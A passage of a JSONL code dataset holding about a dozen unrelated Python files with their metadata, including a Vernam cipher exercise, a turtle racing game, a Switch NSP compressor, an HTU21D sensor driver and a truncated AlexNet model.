str(file))\n\n\t# Practice file drag:\n\tgui.moveTo(file[0], file[1])\n\t# exPt = (int((ul[0]+lr[0])/2), int((ul[1]+lr[1])/2) - 100)\n\texPt = (800, 240)\n\tgui.dragTo(exPt[0], exPt[1], button='left', duration=1)\n\n\n\n\nif __name__ == '__main__':\n\t#main()\n\tlaunchAirdrop()\n\tlaunchAdsDirectory()\n\n\t# demos.moveBetweenProfileCenters()\n\t# demos.boxNames()\n\t# demos.printNames()\n\t# demos.printProfiles()\n\tdemos.dragAdsToProfiles()\n\n\t# coor = ss.locateAd(2)\n\t# print(coor)\n\t# gui.moveTo(coor)\n\t# gui.mouseDown()\n\t# gui.mouseUp()\n\n\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"596408067","text":"\"\"\"\nAuthor: Bruno Luca\nDate: 15-10-2020\nProgramma che cifra un messaggio dato dall'utente con chiave inserita da tastiera usando un cifrario di Vernan\n\"\"\"\n\nnumber2char = {}\nchar2number = {}\nfor i in range (65,91):\n char2number[chr(i)] = i - 65\n number2char[i-65] = chr(i)\n\ndef cifratore(msg = input(\"MESSAGGIO>> \"),chiave = input(\"CHIAVE>> \")):\n\n global number2char\n global char2number\n\n while len(msg) > len(chiave):\n print(f\"key lenght must be at least {len(msg)}...\\t current({len(chiave)})\")\n chiave = input(\"CHIAVE>> \")\n\n msg = msg.upper()\n chiave = chiave.upper()\n\n cifred_msg = \"\"\n for i,c in enumerate(msg):\n print(chiave[i])\n if ord(c) in range(65,91):\n cifred_msg = cifred_msg + number2char[(char2number[c] + char2number[chiave[i]])%26]\n else:\n cifred_msg = cifred_msg + c\n\n decifratore(cifred_msg,chiave)\n\n\ndef decifratore(msg,chiave):\n\n global number2char\n global char2number\n\n print(f\"\"\" \n cifratore has \n msg = {msg}\n key = {chiave}\n \"\"\")\n\n dec_msg = \"\"\n for i,c in enumerate(msg):\n if ord(c) in range(65,91):\n dec_msg = dec_msg + number2char[(char2number[c] - char2number[chiave[i]])%26]\n else:\n dec_msg = dec_msg + c\n\n print(f\"DECRIPTED MSG>> {dec_msg}\")\n\n\nif __name__ == \"__main__\":\n cifratore()","sub_path":"sistemi_V/python/es001_vernan/cifratore.py","file_name":"cifratore.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"607500750","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('board/', views.home, name = 'home'),\n path('show_write_form/', views.show_write_form),\n path('DoWriteBoard/', views.DoWriteBoard),\n path('listSpecificPageWork/', views.listSpecificPageWork),\n path('view/', views.viewWork, name = 'viewWork'),\n]","sub_path":"board/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"276071980","text":"class Solution:\n def isPowerOfThree(self, n):\n \"\"\"\n :type n: int\n :rtype: bool\n \"\"\"\n if n <= 0:\n return False\n import math\n return math.pow(3,19) % n == 0\n\ndef main():\n import sys\n def readlines():\n for line in sys.stdin:\n yield line.strip('\\n')\n\n lines = readlines()\n while True:\n try:\n line = next(lines)\n n = int(line);\n \n ret = Solution().isPowerOfThree(n)\n\n out = (ret);\n print(out)\n except StopIteration:\n break\n\nif __name__ == '__main__':\n main()","sub_path":"pytcode/326. Power of Three/Power_of_Three.py","file_name":"Power_of_Three.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"564589029","text":"from random import randrange\nfrom functools import reduce\n\n\ndef union(a, x):\n a.add(x)\n return a\n\n\ndef reverse(a, x):\n a.insert(0, x)\n return a\n\n\ndef fun(value, *action):\n d_1 = {'sum': lambda a, x: a + x,\n 'multiply': lambda a, x: a * x,\n 'join': lambda a, x: 10 * a + x,\n 'union': union,\n 'reverse': reverse}\n\n d_2 = {'negated': lambda x: -x,\n 'inverted': lambda x: 1 / x,\n 'squared': lambda x: x * x}\n\n d_3 = {'odds': lambda x: x % 2 != 0,\n 'evens': lambda x: x % 2 == 0,\n 'simples': lambda x: x in {1, 2, 3, 5, 7}}\n\n d_start = {'sum': 0, 'multiply': 1, 'join': 0, 'union': set(), 'reverse': list()}\n\n return reduce(d_1[action[0]], map(d_2[action[1]], filter(d_3[action[2]], value)), d_start[action[0]])\n\n\nL = int(input('N: '))\nseq = []\nfor i in range(L):\n seq.append(randrange(1, 10))\n\nprint(seq)\n\nwhile True:\n actions = input('Action: ')\n actions = actions.split(' ')\n\n try:\n seq = fun(seq, *actions)\n except (KeyError, IndexError):\n print('Action is not correct.\\nTry again.')\n else:\n break\n\nprint(seq)\n","sub_path":"HW_3/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"89042524","text":"#----------------------------------Datos del problema-------------------------------------\n#Ejercicio #\n# Escribe el programaque lea muchos valores de n y que calcule la expresión\n# Roberto Carlos Llanes Montero (Equipo 'about:blank')\n\n#----------------------------------Prototipo de funciones----------------------------------\n#Python no permite la creación de prototipos debido al funcionamiento de la definición de \n#sus funciones, de hecho, gran parte de estos conceptos estan haciendo más lento al proceso\n#de python :c\n\n#----------------------------------------Funciones------------------------------------------\n#También python no acepta poner funciones al final :c\n\ndef getEne():\n\tEne = int(input())\n\treturn Ene \ndef proceso(n):\n\tprint(\"y = 1\",end = ' ')\n\tif( n == 1 ):\n\t\tprint(\"+ x\",end = ' ')\t\n\telse:\n\t\tfor i in range(1,Ene+1):\n\t\t\tsalida(i)\n\t\t\t\t\ndef salida(n):\n\tif( n > 1 ):\n\t\tif( n % 2 == 0 ):\n\t\t\tprint(\"+ {}x^{}/{}!\".format(n,n,n),end = ' ')\n\t\telse:\n\t\t\tprint(\"- {}x^{}/{}!\".format(n,n,n),end = ' ')\n\n#----------------------------------------Proceso-------------------------------------------\n#Obtener el dato de inicio\nEne = getEne()\n#Proceso\nproceso(Ene)\n","sub_path":"Unidad 3-Funciones/Ejercicio53.py","file_name":"Ejercicio53.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"554294119","text":"import turtle\nimport random\nimport time\n\ngame_over = False\n\nplayer_pos = [0, 0]\nplayer_stamp = -1\ntracks = []\ntrack_stamps = []\nscore = 0\n\nturtle.pu()\nturtle.tracer(0,0)\nturtle.bgcolor('black')\n\nfont = turtle.Turtle()\n\ndef reset():\n global tracks, track_stamps, player_pos, player_stamp, score, game_over\n\n turtle.clearstamp(player_stamp)\n clear_track()\n \n game_over = False\n score = 0\n player_pos = [0, 0]\n player_stamp = -1\n tracks = []\n track_stamps = [] \n for i in range(21): \n tracks.append({'position': [0, 200 - i * 20], 'width': 150})\n\ndef clear_track():\n global track_stamps\n for track in track_stamps:\n turtle.clearstamp(track)\n track_stamps = []\n\ndef draw_track():\n global tracks\n for track in tracks:\n x_pos = track['position'][0] - track['width']/2\n y_pos = track['position'][1]\n turtle.color('blue')\n turtle.setpos(x_pos, y_pos)\n turtle.shape('square')\n track_stamps.append(turtle.stamp())\n\n x_pos = track['position'][0] + track['width']/2\n y_pos = track['position'][1]\n turtle.color('blue')\n turtle.setpos(x_pos, y_pos)\n turtle.shape('square')\n track_stamps.append(turtle.stamp())\n\ndef scroll_track():\n global tracks, score\n\n score += 5\n tracks.pop(0)\n for track in tracks:\n track['position'][1] += 20\n x_pos = tracks[len(tracks)-1]['position'][0]\n width = tracks[len(tracks)-1]['width']\n \n step = random.randint(-2, 2)\n x_pos += step * 10\n \n width_step = random.randint(-1, 1)\n width += width_step * 5\n if (width <= 70):\n width = 70\n if (width >=150):\n width = 150\n\n if x_pos - width/2 < -200:\n x_pos = -200 + width/2\n if x_pos + width/2 > 200:\n x_pos = 200 - width/2\n tracks.append({'position': [x_pos, -200], 'width': width})\n\ndef draw_player():\n global player_stamp, score\n\n font.clear()\n font.ht()\n font.setpos(-70, 220)\n font.color(\"white\")\n font.write(\"Score: \" + str(score), font=(\"Terminal\", 16, \"normal\"))\n \n turtle.clearstamp(player_stamp)\n turtle.setpos(player_pos)\n turtle.shape('square')\n turtle.color('red')\n player_stamp = turtle.stamp()\n\ndef check_collision():\n global game_over, player_pos, tracks\n row = int((200 - player_pos[1]) / 20)\n if player_pos[0] <= (tracks[row]['position'][0] - tracks[row]['width']/2):\n game_over = True\n elif player_pos[0] >= (tracks[row]['position'][0] + tracks[row]['width']/2):\n game_over = True\n\ndef run_game():\n \n global game_over\n try:\n check_collision()\n if not game_over: \n scroll_track()\n clear_track()\n draw_track()\n\n draw_player()\n turtle.update()\n\n turtle.ontimer(run_game, 16)\n except Exception as e:\n return\n\ndef left():\n global player_pos\n player_pos[0] -= 10\n\ndef right():\n global player_pos\n player_pos[0] += 10\n\ndef up():\n global player_pos, score\n player_pos[1] += 20\n if player_pos[1] > 200:\n player_pos[1] = 200\n\ndef down():\n global player_pos, score\n player_pos[1] -= 20\n if player_pos[1] < -200:\n player_pos[1] = -200\n\ndef start():\n global game_over\n if game_over:\n reset()\n\nturtle.onkeypress(left, 'Left')\nturtle.onkeypress(right, 'Right')\nturtle.onkeypress(up, 'Up')\nturtle.onkeypress(down, 'Down')\nturtle.onkeypress(start, 'space')\nturtle.listen()\n\nreset()\nrun_game()\n\n","sub_path":"Demos/racer_game.py","file_name":"racer_game.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"553510766","text":"import numpy as np\nimport protocol\nimport socket\nimport base64\nimport cv2\nimport sys, tty, termios\n\ndef draw_line(img,lines):\n gray = cv2.cvtColor(warp,cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray,50,150,apertureSize = 3)\n #cv2.imshow('image',edges)\n minLineLength = 2\n maxLineGap = 1\n lines = cv2.HoughLinesP(edges,1,np.pi/180,5,minLineLength,maxLineGap)\n #print(lines)\n for line in lines:\n x1,y1,x2,y2 = line[0]\n cv2.line(warp,(x1,y1),(x2,y2),(100,50,50),4)\n\n#import command_system\ndef getch():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\ndef decode_recv(data):\n jpg_original = base64.b64decode(data)\n jpg_as_np = np.frombuffer(jpg_original, dtype=np.uint8)\n image = cv2.imdecode(jpg_as_np, flags=1)\n return image\n\ndef encode_send(char):\n accel=0\n breake=0\n left=0\n right=0\n if(char == \"w\"):\n accel = 1\n if(char == \"s\"):\n breake = 1 \n if(char == \"a\"):\n left = 1\n if(char == \"d\"):\n right = 1\n \n input1 = \"(accel \" +\\\n str(accel) +\\\n \")\" +\\\n \"*\" +\\\n \"(breake \" +\\\n str(breake) +\\\n \")\" +\\\n \"*\" +\\\n \"(left \" +\\\n str(left) +\\\n \")\" +\\\n \"*\" +\\\n \"(right \" +\\\n str(right) +\\\n \")\";\n data = base64.b64encode(input1.encode('utf-8'))\n return data\n\ndef image_warp(image):\n img = cv2.resize(image, (400, 400)) \n src = np.array([[82,247],[227,247],[280,360],[32,360]],np.float32)\n center_x = 150\n center_y = 250\n maxWidth, maxHeight = 400, 400\n hwratio = 11/8.5 #letter size paper\n scale = int(maxWidth/12)\n dst = np.array([\n [center_x - scale, center_y - scale*hwratio], #top left\n [center_x + scale, center_y - scale*hwratio], #top right\n [center_x + scale, center_y + scale*hwratio], #bottom right\n [center_x - scale, center_y + scale*hwratio], #bottom left\n ], dtype = \"float32\")\n M = cv2.getPerspectiveTransform(src, dst)\n warp = cv2.warpPerspective(img, M, (400, 300))\n gray_warp = cv2.cvtColor(warp, cv2.COLOR_BGR2GRAY)\n hsv = cv2.cvtColor(warp, cv2.COLOR_BGR2HSV)\n # define range of blue color in HSV\n lower_blue = np.array([70,50,50])\n upper_blue = np.array([120,255,255])\n # Threshold the HSV image to get only blue colors\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\n \n return mask\n","sub_path":"pc/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"551809385","text":"import matplotlib.pyplot as plt\nfrom matplotlib.patches import Ellipse\nimport numpy as np\n\ndef plot_cov_ellipse(cov, pos, nstd=2, ax=None, **kwargs):\n def eigsorted(cov):\n vals, vecs = np.linalg.eigh(cov)\n order = vals.argsort()[::-1]\n return vals[order], vecs[:,order]\n\n if ax is None:\n ax = plt.gca()\n\n vals, vecs = eigsorted(cov)\n theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))\n\n # Width and height are \"full\" widths, not radius\n width, height = 2 * nstd * np.sqrt(vals)\n ellip = Ellipse(xy=pos, width=width, height=height, angle=theta, **kwargs)\n\n ax.add_artist(ellip)\n return ellip\n\ndef plot_clusters(Xs, mus, covs):\n fig, ax = plt.subplots(figsize=(4, 4))\n ax.set_xlim(-5, 15)\n ax.set_ylim(-5, 15)\n ax.plot(Xs[:,0], Xs[:,1], 'ro')\n plot_cov_ellipse(cov=covs[0], pos=mus[0], nstd=2, ax=ax, alpha=0.5)\n plot_cov_ellipse(cov=covs[1], pos=mus[1], nstd=2, ax=ax, alpha=0.5)\n plot_cov_ellipse(cov=covs[2], pos=mus[2], nstd=2, ax=ax, alpha=0.5)\n plt.show()\n\ndef plot_velocity_circle(v):\n fig = plt.figure(figsize=(4,4))\n ax = fig.gca()\n ax.scatter(v[:,0], v[:,1], label='z=1')\n ax.scatter(-v[:,0], v[:,1], label='z=2')\n ax.scatter(v[:,0], -v[:,1], label='z=3')\n ax.scatter(-v[:,0], -v[:,1], label='z=4')\n ax.set_xlabel('x velocity')\n ax.set_ylabel('y velocity')\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=4)\n\ndef plot_transition(As_pred, As_true, vmax):\n As_infer = As_pred / As_pred.sum(-1)[:, :, None]\n As_infer = As_infer.mean(0)\n fig3 = plt.figure(figsize=(8,8))\n ax1 = fig3.add_subplot(1, 2, 1)\n infer_plot = ax1.imshow(As_infer, cmap='Greys', vmin=0, vmax=vmax)\n ax1.set_xticks([])\n ax1.set_yticks([])\n ax1.set_title('inferred averaged transition matrix')\n ax2 = fig3.add_subplot(1, 2, 2)\n As_true_ave = As_true.mean(0)\n true_plot = ax2.imshow(As_true_ave, cmap='Greys', vmin=0, vmax=vmax)\n ax2.set_xticks([])\n ax2.set_yticks([])\n ax2.set_title('true averaged transition matrix')\n cbaxes = fig3.add_axes([0.95, 0.32, 0.02, 0.36])\n cb = plt.colorbar(true_plot, cax = cbaxes)\n return As_infer, As_true_ave\n","sub_path":"HMM/util_plots.py","file_name":"util_plots.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"340248701","text":"#from Fs.Pfs0 import Pfs0Stream\nfrom nut import Print\nimport os\nimport json\nimport Fs\nimport Fs.Pfs0\nimport Fs.Type\nimport Fs.Nca\nimport Fs.Type\nimport subprocess\nfrom contextlib import closing\nimport zstandard\nimport time\nfrom tqdm import tqdm\n\ndef sortedFs(nca):\n\tfs = []\n\tfor i in nca.sections:\n\t\tfs.append(i)\n\tfs.sort(key=lambda x: x.offset)\n\treturn fs\n\ndef isNcaPacked(nca):\n\tfs = sortedFs(nca)\n\n\tif len(fs) == 0:\n\t\treturn True\n\n\tnext = 0x4000\n\tfor i in range(len(fs)):\n\t\tif fs[i].offset != next:\n\t\t\treturn False\n\n\t\tnext = fs[i].offset + fs[i].size\n\n\tif next != nca.size:\n\t\treturn False\n\n\treturn True\n\ndef compress(filePath, compressionLevel = 17, outputDir = None, threads = 0):\n\tfilePath = os.path.abspath(filePath)\n\tcontainer = Fs.factory(filePath)\n\n\tcontainer.open(filePath, 'rb')\n\n\tCHUNK_SZ = 0x1000000\n\n\tif outputDir is None:\n\t\tnszPath = filePath[0:-1] + 'z'\n\telse:\n\t\tnszPath = os.path.join(outputDir, os.path.basename(filePath[0:-1] + 'z'))\n\t\t\n\tnszPath = os.path.abspath(nszPath)\n\t\n\tPrint.info('compressing (level %d, %d threads) %s -> %s' % (compressionLevel, threads, filePath, nszPath))\n\t\n\tnewNsp = Fs.Pfs0.Pfs0Stream(nszPath)\n\n\tfor nspf in container:\n\t\tif isinstance(nspf, Fs.Nca.Nca) and (nspf.header.contentType == Fs.Type.Content.PROGRAM or nspf.header.contentType == Fs.Type.Content.PUBLICDATA):\n\t\t\tif isNcaPacked(nspf):\n\t\t\t\tcctx = zstandard.ZstdCompressor(level=compressionLevel, threads = threads)\n\n\t\t\t\tnewFileName = nspf._path[0:-1] + 'z'\n\n\t\t\t\tf = newNsp.add(newFileName, nspf.size)\n\t\t\t\t\n\t\t\t\tstart = f.tell()\n\n\t\t\t\tnspf.seek(0)\n\t\t\t\tf.write(nspf.read(0x4000))\n\t\t\t\twritten = 0x4000\n\t\t\t\t\n\t\t\t\ttimestamp = time.time()\n\n\t\t\t\tcompressor = cctx.stream_writer(f)\n\t\t\t\t\n\t\t\t\theader = b'NCZSECTN'\n\t\t\t\theader += len(sortedFs(nspf)).to_bytes(8, 'little')\n\t\t\t\t\n\t\t\t\ti = 0\n\t\t\t\tfor fs in sortedFs(nspf):\n\t\t\t\t\ti += 1\n\t\t\t\t\theader += fs.realOffset().to_bytes(8, 'little')\n\t\t\t\t\theader += fs.size.to_bytes(8, 'little')\n\t\t\t\t\theader += fs.cryptoType.to_bytes(8, 'little')\n\t\t\t\t\theader += b'\\x00' * 8\n\t\t\t\t\theader += fs.cryptoKey\n\t\t\t\t\theader += fs.cryptoCounter\n\t\t\t\t\t\n\t\t\t\tf.write(header)\n\t\t\t\twritten += len(header)\n\t\t\t\t\n\t\t\t\tdecompressedBytes = 0x4000\n\t\t\t\t\n\t\t\t\twith tqdm(total=nspf.size, unit_scale=True, unit=\"B/s\") as bar:\n\t\t\t\t\tfor fs in sortedFs(nspf):\n\t\t\t\t\t\tfs.seek(0)\n\n\t\t\t\t\t\twhile not fs.eof():\n\t\t\t\t\t\t\tbuffer = fs.read(CHUNK_SZ)\n\t\t\t\t\t\t\tnbytes = len(buffer)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif nbytes == 0:\n\t\t\t\t\t\t\t\traise IOError('read failed')\n\n\t\t\t\t\t\t\twritten += compressor.write(buffer)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tdecompressedBytes += nbytes\n\t\t\t\t\t\t\tbar.update(nbytes)\n\t\t\t\tcompressor.flush(zstandard.FLUSH_FRAME)\n\t\t\t\t\n\t\t\t\telapsed = time.time() - timestamp\n\t\t\t\tminutes = elapsed / 60\n\t\t\t\tseconds = elapsed % 60\n\t\t\t\t\n\t\t\t\tspeed = 0 if elapsed == 0 else (nspf.size / elapsed)\n\n\t\t\t\twritten = f.tell() - start\n\t\t\t\tprint('\\ncompressed %d%% %d -> %d - %s' % (int(written * 100 / nspf.size), decompressedBytes, written, nspf._path))\n\t\t\t\tprint('duration: %02d:%02d speed: %.1f MB/s\\n' % (minutes, seconds, speed / 1000000.0))\n\t\t\t\tnewNsp.resize(newFileName, written)\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprint('not packed!')\n\n\t\tf = newNsp.add(nspf._path, nspf.size)\n\t\tnspf.seek(0)\n\t\twith tqdm(total=nspf.size, unit_scale=True, unit=\"B/s\") as bar:\n\t\t\twhile not nspf.eof():\n\t\t\t\tbuffer = nspf.read(CHUNK_SZ)\n\t\t\t\tf.write(buffer)\n\t\t\t\tbar.update(len(buffer))\n\n\tnewNsp.close()\n","sub_path":"compressor/nut/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"154407614","text":"#!/usr/bin/env python\n\n# Copyright 2014 IIJ Innovation Institute Inc. All rights reserved.\n# Copyright 2014 Keiichi Shima. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR\n# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n'''A Python class to access HTU21D based relative humidity sensor\nprovided by SWITCHSCIENCE as a part no. SFE-SEN-12064.\n\nExample:\n\nbus = 1\nsensor = htu21d.Htu21d(bus)\nprint(sensor.humidity)\n\n'''\n\nimport time\nimport array\n\nfrom i2cdev import I2C\n\nI2C_SLAVE = 0x0703\nHTU21D_ADDR = 0x40\nCMD_READ_TEMP_HOLD = b\"\\xE3\"\nCMD_READ_HUM_HOLD = b\"\\xE5\"\nCMD_READ_TEMP_NOHOLD = b\"\\xF3\"\nCMD_READ_HUM_NOHOLD = b\"\\xF5\"\nCMD_WRITE_USER_REG = b\"\\xE6\"\nCMD_READ_USER_REG = b\"\\xE7\"\nCMD_SOFT_RESET = b\"\\xFE\"\n\n\nclass Htu21d(object):\n def __init__(self, address):\n self.dev = I2C(HTU21D_ADDR, 1, address) # HTU21D 0x40, bus 1\n with self.dev.lock:\n self.dev.write(CMD_SOFT_RESET) # soft reset\n time.sleep(.1)\n\n def ctemp(self, sensorTemp):\n tSensorTemp = sensorTemp / 65536.0\n return -46.85 + (175.72 * tSensorTemp)\n\n def chumid(self, sensorHumid):\n tSensorHumid = sensorHumid / 65536.0\n return -6.0 + (125.0 * tSensorHumid)\n\n def crc8check(self, value):\n # Ported from Sparkfun Arduino HTU21D Library: https://github.com/sparkfun/HTU21D_Breakout\n remainder = ((value[0] << 8) + value[1]) << 8\n remainder |= value[2]\n\n # POLYNOMIAL = 0x0131 = x^8 + x^5 + x^4 + 1\n # divsor = 0x988000 is the 0x0131 polynomial shifted to farthest left of three bytes\n divsor = 0x988000\n\n for i in range(0, 16):\n if(remainder & 1 << (23 - i)):\n remainder ^= divsor\n divsor = divsor >> 1\n\n if remainder == 0:\n return True\n else:\n return False\n\n def read_temperature(self):\n with self.dev.lock:\n self.dev.write(CMD_READ_TEMP_NOHOLD) # measure temp\n time.sleep(.1)\n\n data = self.dev.read(3)\n buf = array.array('B', data)\n\n if self.crc8check(buf):\n temp = (buf[0] << 8 | buf[1]) & 0xFFFC\n return self.ctemp(temp)\n else:\n return -255\n\n def read_humidity(self):\n with self.dev.lock:\n self.dev.write(CMD_READ_HUM_NOHOLD) # measure humidity\n time.sleep(.1)\n\n data = self.dev.read(3)\n buf = array.array('B', data)\n\n if self.crc8check(buf):\n humid = (buf[0] << 8 | buf[1]) & 0xFFFC\n return self.chumid(humid)\n else:\n return -255\n\nif __name__ == \"__main__\":\n obj = HTU21D(I2C_SLAVE)\n print(\"Temp:\", obj.read_temperature(), \"C\")\n print(\"Humid:\", obj.read_humidity(), \"% rH\")\n","sub_path":"linsensors/htu21d.py","file_name":"htu21d.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"180161011","text":"import os\nimport time\nimport tensorflow as tf\nfrom tensorflow.python.client import timeline\nfrom tensorflow.python.framework import meta_graph\nfrom tensorflow.core.protobuf import device_properties_pb2\nfrom tensorflow.python.grappler import cluster\nfrom tensorflow.python.grappler import cost_analyzer\nfrom tensorflow.python.framework import ops as tf_ops\n\nbatch_size = 32\nnum_bathes = 100\n\n\ndef print_tensor_info(tensor):\n print(\"tensor name:\", tensor.op.name, \"-tensor shape:\", tensor.get_shape().as_list())\n\n\ndef inference(images):\n parameters = []\n\n with tf.name_scope(\"conv1\") as scope:\n kernel1 = tf.Variable(tf.truncated_normal([11, 11, 3, 64], mean=0, stddev=0.1,\n dtype=tf.float32), name=\"weights\")\n conv = tf.nn.conv2d(images, kernel1, [1, 4, 4, 1], padding=\"SAME\")\n biases = tf.Variable(tf.constant(0, shape=[64], dtype=tf.float32), trainable=True, name=\"biases\")\n bias = tf.nn.bias_add(conv, biases)\n conv1 = tf.nn.relu(bias, name=scope)\n print_tensor_info(conv1)\n parameters += [kernel1, biases]\n lrn1 = tf.nn.lrn(conv1, 4, bias=1, alpha=1e-3 / 9, beta=0.75, name=\"lrn1\")\n pool1 = tf.nn.max_pool(lrn1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding=\"VALID\", name=\"pool1\")\n print_tensor_info(pool1)\n\n with tf.name_scope(\"conv2\") as scope:\n kernel2 = tf.Variable(tf.truncated_normal([5, 5, 64, 192], dtype=tf.float32, stddev=0.1)\n , name=\"weights\")\n conv = tf.nn.conv2d(pool1, kernel2, [1, 1, 1, 1], padding=\"SAME\")\n biases = tf.Variable(tf.constant(0, dtype=tf.float32, shape=[192])\n , trainable=True, name=\"biases\")\n bias = tf.nn.bias_add(conv, biases)\n conv2 = tf.nn.relu(bias, name=scope)\n print_tensor_info(conv2)\n parameters += [kernel2, biases]\n lrn2 = tf.nn.lrn(conv2, 4, 1.0, alpha=1e-3 / 9, beta=0.75, name=\"lrn2\")\n pool2 = tf.nn.max_pool(lrn2, [1, 3, 3, 1], [1, 2, 2, 1], padding=\"VALID\", name=\"pool2\")\n print_tensor_info(pool2)\n\n with tf.name_scope(\"conv3\") as scope:\n kernel3 = tf.Variable(tf.truncated_normal([3, 3, 192, 384], dtype=tf.float32, stddev=0.1)\n , name=\"weights\")\n conv = tf.nn.conv2d(pool2, kernel3, strides=[1, 1, 1, 1], padding=\"SAME\")\n biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32), trainable=True, name=\"biases\")\n bias = tf.nn.bias_add(conv, biases)\n conv3 = tf.nn.relu(bias, name=scope)\n parameters += [kernel3, biases]\n print_tensor_info(conv3)\n\n with tf.name_scope(\"conv4\") as scope:\n kernel4 = tf.Variable(tf.truncated_normal([3, 3, 384, 256], stddev=0.1, dtype=tf.float32),\n name=\"weights\")\n conv = tf.nn.conv2d(conv3, kernel4, strides=[1, 1, 1, 1], padding=\"SAME\")\n biases = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[256]), trainable=True, name=\"biases\")\n bias = tf.nn.bias_add(conv, biases)\n conv4 = tf.nn.relu(bias, name=scope)\n parameters += [kernel4, biases]\n print_tensor_info(conv4)\n\n with tf.name_scope(\"conv5\") as scope:\n kernel5 = tf.Variable(tf.truncated_normal([3, 3, 256, 256], stddev=0.1, dtype=tf.float32),\n name=\"weights\")\n conv = tf.nn.conv2d(conv4, kernel5, strides=[1, 1, 1, 1], padding=\"SAME\")\n biases = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[256]), name=\"biases\")\n bias = tf.nn.bias_add(conv, biases)\n conv5 = tf.nn.relu(bias)\n parameters += [kernel5, bias]\n pool5 = tf.nn.max_pool(conv5, [1, 3, 3, 1], [1, 2, 2, 1], padding=\"VALID\", name=\"pool5\")\n print_tensor_info(pool5)\n\n pool5 = tf.reshape(pool5, (-1, 6 * 6 * 256))\n weight6 = tf.Variable(tf.truncated_normal([6 * 6 * 256, 4096], stddev=0.1, dtype=tf.float32),\n name=\"weight6\")\n ful_bias1 = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[4096]), name=\"ful_bias1\")\n ful_con1 = tf.nn.relu(tf.add(tf.matmul(pool5, weight6), ful_bias1))\n\n weight7 = tf.Variable(tf.truncated_normal([4096, 4096], stddev=0.1, dtype=tf.float32),\n name=\"weight7\")\n ful_bias2 = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[4096]), name=\"ful_bias2\")\n ful_con2 = tf.nn.relu(tf.add(tf.matmul(ful_con1, weight7), ful_bias2))\n\n weight8 = tf.Variable(tf.truncated_normal([4096, 1000], stddev=0.1, dtype=tf.float32),\n name=\"weight8\")\n ful_bias3 = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[1000]), name=\"ful_bias3\")\n ful_con3 = tf.nn.relu(tf.add(tf.matmul(ful_con2, weight8), ful_bias3))\n\n weight9 = tf.Variable(tf.truncated_normal([1000, 10], stddev=0.1), dtype=tf.float32, name=\"weight9\")\n bias9 = tf.Variable(tf.constant(0.0, shape=[10]), dtype=tf.float32, name=\"bias9\")\n output_softmax = tf.nn.softmax(tf.matmul(ful_con3, weight9) + 